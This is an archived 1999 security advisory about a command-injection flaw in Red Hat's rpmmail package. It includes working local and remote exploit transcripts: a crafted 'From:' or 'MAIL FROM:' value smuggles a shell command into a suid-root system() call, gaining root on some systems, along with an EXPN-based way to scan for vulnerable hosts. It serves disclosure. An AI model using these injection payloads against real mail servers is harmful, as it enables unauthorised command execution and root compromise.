Vulners
Lucene search
RH6_rpmmail_exploit.txt
`Greetings,
A vulnerability exists in the rpmmail package distributed on the Red Hat 6.0
Extra Applications CD. The potential compromise for this bug could be remote
or local root or simply remote command execution as "nobody" or similar,
depending on your system configuration.
By sending a carefully crafted mail message to rpmmail@vulnerablehost, you can
get /home/rpmmail/rpmmail (suid root by default, exec'd by .forward remotely)
to system(3) any command you wish. The command executed does not necessarily
have root privs because of bash's handling of euid != uid of caller. Although
system(3) calls /bin/sh -c, it is linked by default (can anyone verify
these?) on some Linux systems, such as SuSE 6.2, to /bin/bash v2. From the
system(3) man page:
system() will not, in fact, work properly from programs
with suid or sgid privileges on systems on which
/bin/sh is bash version 2, since bash 2 drops privileges
on startup. (Debian uses a modified bash which does not
do this when invoked as sh.)
Thus some systems with rpmmail installed are vulnerable to local/remote root,
all others to remote command execution as an unpriv'd user.
The local exploit as follows:
/bin/sh is linked to /bin/bash (default SuSE 6.2 behavior:
bash-2.03$ ls -la /bin/sh
lrwxrwxrwx 1 root root 9 Oct 5 11:27 /bin/sh -> /bin/bash
bash-2.03$ cat /etc/SuSE-release;uname -a;id
SuSE Linux 6.2 (i386)
VERSION = 6.2
Linux fear62 2.2.10 #1 Tue Jul 20 16:32:24 MEST 1999 i686 unknown
uid=100(xnec) gid=100(users) groups=100(users)
bash-2.03$ echo "From: ;/usr/bin/id;" | /home/rpmmail/rpmmail -c bah
Could not open config file!
sh: Y: command not found
uid=100(xnec) gid=100(users) groups=100(users)
Could not open acknowledge file!
bash-2.03$
----
After linking /bin/sh to /bin/ksh instead:
bash-2.03$ ls -la /bin/sh
lrwxrwxrwx 1 root root 8 Oct 5 11:09 /bin/sh -> /bin/ksh
bash-2.03$ cat /etc/SuSE-release;uname -a;id
SuSE Linux 6.2 (i386)
VERSION = 6.2
Linux fear62 2.2.10 #1 Tue Jul 20 16:32:24 MEST 1999 i686 unknown
uid=100(xnec) gid=100(users) groups=100(users)
bash-2.03$ echo "From: ;/usr/bin/id;" | /home/rpmmail/rpmmail -c bah
Could not open config file!
sh: Y: not found
uid=100(xnec) gid=100(users) euid=0(root) egid=0(root) groups=100(users)
Could not open acknowledge file!
bash-2.03$
The remote exploit is merely:
bash-2.03$ telnet localhost 25
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
220 fear62 Smail-3.2 (#1 1999-Jul-23) ready at Tue, 5 Oct 1999 11:31:13 -0500
(CDT)
MAIL FROM: ;/command/to/execute;
250 <;/command/to/execute;> ... Sender Okay
RCPT TO: rpmmail
250 <rpmmail> ... Recipient Okay
data
354 Enter mail, end with "." on a line by itself
.
250 Mail accepted
quit
A remote scan of vulnerable hosts for this problem would be simple as well,
since EXPN can be used to verify the existence of the .forward file:
220 fear62 Smail-3.2 (#1 1999-Jul-23) ready at Tue, 5 Oct 1999 11:38:44 -0500
(CDT)
EXPN rpmmail
250 "| /home/rpmmail/rpmmail -c /home/rpmmail/rpmmail.conf"
Brock Tellier
UNIX Systems Administrator
____________________________________________________________________
Get free email and a permanent address at http://www.netaddress.com/?N=1
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
05 Oct 1999 00:00Current
0.1Low risk
Vulners AI Score0.1